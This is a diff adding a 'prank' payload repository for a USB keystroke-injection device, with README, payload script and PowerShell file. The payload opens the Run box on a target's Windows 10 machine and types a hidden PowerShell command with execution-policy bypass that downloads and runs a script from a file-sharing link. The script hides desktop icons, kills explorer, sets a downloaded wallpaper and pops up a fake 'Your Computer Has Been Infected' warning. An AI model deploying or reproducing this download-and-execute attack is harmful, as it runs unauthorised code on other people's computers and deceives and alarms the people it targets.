New Payload - RanFunWare

RanFunWare/README.md

@@ -0,0 +1,108 @@
+<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/WannaCry.png" width="200">
+
+<h1 align="center">
+  <a href="https://git.io/typing-svg">
+    <img src="https://readme-typing-svg.herokuapp.com/?lines=RanFunWare!+😈&center=true&size=30">
+  </a>
+</h1>
+
+<!-- TABLE OF CONTENTS -->
+<details>
+  <summary>Table of Contents</summary>
+  <ol>
+    <li><a href="#Description">Description</a></li>
+    <li><a href="#getting-started">Getting Started</a></li>
+    <li><a href="#Contributing">Contributing</a></li>
+    <li><a href="#Version-History">Version History</a></li>
+    <li><a href="#Contact">Contact</a></li>
+    <li><a href="#Acknowledgments">Acknowledgments</a></li>
+  </ol>
+</details>
+
+# RanFunWare
+
+A payload to prank your friends into thinking their computer got hit with ransomware.
+
+## Description
+
+This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable)
+
+## Getting Started
+
+### Dependencies
+
+* DropBox or other file sharing service - Your Shared link for the intended file
+* Windows 10
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
+```
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Contributing
+
+All contributors names will be listed here
+
+atomiczsec
+
+I am Jakoby
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Version History
+
+* 0.1
+    * Initial Release
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- CONTACT -->
+## Contact
+
+<h2 align="center">📱 My Socials 📱</h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
+      </a>
+      <br>YouTube
+    </td>
+    <td align="center" width="96">
+      <a href="https://twitter.com/atomiczsec">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
+      </a>
+      <br>Twitter
+    </td>
+    <td align="center" width="96">
+      <a href="https://discord.gg/MYYER2ZcJF">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
+      </a>
+      <br>I-Am-Jakoby's Discord
+    </td>
+  </tr>
+</table>
+</div>
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+
+
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- ACKNOWLEDGMENTS -->
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+<p align="right">(<a href="#top">back to top</a>)</p>

RanFunWare/payload.txt

@@ -0,0 +1,16 @@
+REM     Title: RanFunWare
+
+REM     Author: atomiczsec
+
+REM     Description: This payload will prank your target into thinking their machine got hit with ransomware.
+
+REM     Target: Windows 10
+
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
+ENTER
+
+REM     Remember to replace the link with your DropBox shared link for the intended file to download
+REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

RanFunWare/r.ps1

@@ -0,0 +1,70 @@
+#Hides Desktop Icons
+$Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
+Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1
+Get-Process "explorer"| Stop-Process
+
+#Changes Background  
+#URL For the Image of your choice (Wanna Cry Ransomware Background)
+$url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg"
+
+
+Invoke-WebRequest $url -OutFile C:\temp\test.jpg
+
+
+$setwallpapersrc = @"
+using System.Runtime.InteropServices;
+
+public class Wallpaper
+{
+  public const int SetDesktopWallpaper = 20;
+  public const int UpdateIniFile = 0x01;
+  public const int SendWinIniChange = 0x02;
+  [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
+  private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);
+  public static void SetWallpaper(string path)
+  {
+    SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange);
+  }
+}
+"@
+Add-Type -TypeDefinition $setwallpapersrc
+
+[Wallpaper]::SetWallpaper("C:\temp\test.jpg")
+
+
+#Pop Up Message
+
+function MsgBox {
+
+[CmdletBinding()]
+param (	
+[Parameter (Mandatory = $True)]
+[Alias("m")]
+[string]$message,
+
+[Parameter (Mandatory = $False)]
+[Alias("t")]
+[string]$title,
+
+[Parameter (Mandatory = $False)]
+[Alias("b")]
+[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')]
+[string]$button,
+
+[Parameter (Mandatory = $False)]
+[Alias("i")]
+[ValidateSet('None','Hand','Question','Warning','Asterisk')]
+[string]$image
+)
+
+Add-Type -AssemblyName PresentationCore,PresentationFramework
+
+if (!$title) {$title = " "}
+if (!$button) {$button = "OK"}
+if (!$image) {$image = "None"}
+
+[System.Windows.MessageBox]::Show($message,$title,$button,$image)
+
+}
+
+MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning